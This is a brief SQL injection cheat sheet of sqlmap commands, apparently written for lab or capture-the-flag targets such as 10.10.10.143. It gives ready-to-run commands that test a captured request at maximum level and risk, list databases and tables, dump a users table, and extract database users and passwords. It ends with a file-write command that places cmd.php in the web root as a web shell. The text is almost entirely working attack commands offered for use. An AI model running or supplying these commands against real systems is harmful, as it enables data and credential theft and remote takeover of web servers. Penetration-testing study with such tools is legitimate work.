SQL Injection

SQL Injection with req.txt

sqlmap -r req.txt -p [TESTPARAMETER] --level 5 --risk 3
  • If you want sqlmap to accept the default answer to every prompt

sqlmap -r req.txt --batch

  • If you know which DBMS is in use

sqlmap -r sqli.txt --dbms=mysql
  • If you want to know which databases are there

sqlmap -r sqli.txt --dbms=mysql --dbs 
  • If you want to know tables in a database

sqlmap -r sqli.txt --dbms=mysql -D status --tables
  • If you want to dump table data

sqlmap -r sqli.txt --dbms=mysql --dump -T users

SQL Injection with URL

sqlmap -u "http://10.10.10.143/room.php?cod=1"
  • If you want to retrieve users and passwords

sqlmap -u "http://10.10.10.143/room.php?cod=1" --users --passwords
  • If you want to upload a file

sqlmap -u "http://10.10.10.143/room.php?cod=1" --file-write cmd.php --file-dest /var/www/html/cmd.php
